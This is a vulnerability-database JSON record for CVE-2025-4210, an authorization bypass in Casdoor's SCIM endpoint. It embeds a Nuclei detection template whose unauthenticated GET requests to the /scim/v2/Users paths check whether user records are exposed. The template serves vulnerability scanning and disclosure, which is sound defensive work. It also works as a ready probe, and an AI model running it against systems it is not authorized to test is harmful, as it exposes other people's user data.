{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2025-4210/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2025-4210/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2025-4210/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2025-4210/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2025-4210/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2025-4210"},"sightings":{"href":"/api/v1/sightings/cve-2025-4210"}},"data":{"nuclei":true,"nuclei_template":"http/cves/2025/CVE-2025-4210.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2025-4210\n\ninfo:\n  name: Casdoor - Authorization Bypass\n  author: theamanrawat\n  severity: high\n  description: |\n    Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.\n  impact: |\n    Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.\n  remediation: |\n    Upgrade to version 1.812.0.\n  reference:\n    - https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-4210\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L\n    cvss-score: 7.3\n    cve-id: CVE-2025-4210\n    epss-score: 0.01841\n    epss-percentile: 0.78086\n    cwe-id: CWE-285\n  metadata:\n    verified: true\n    max-requests: 2\n    vendor: casdoor\n    product: casdoor\n  tags: cve,cve2025,casdoor,scim,auth-bypass,disclosure,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/scim/v2/Users\"\n      - \"{{BaseURL}}/api/scim/v2/Users\"\n\n    stop-at-first-match: true\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - \"schemas\"\n          - \"totalResults\"\n          - \"Resources\"\n          - \"givenName\"\n        condition: and\n\n      - type: word\n        part: header\n        words:\n          - \"application/scim+json\"\n          - \"application/json\"\n        condition: or\n\n      - type: status\n        status:\n          - 200\n# digest: 4b0a00483046022100a6b095dc575e763a5bd7640fe1cd6f1a7431024ddb89bad54b199a039306db5c022100a8c5280859ae743af0a8d8c27f7d02a4330067cc18431e87d4aa24d4a367ef99:922c64590222798bb761d5b6d8e72950"},"source":"nuclei","vuln_id":"cve-2025-4210"}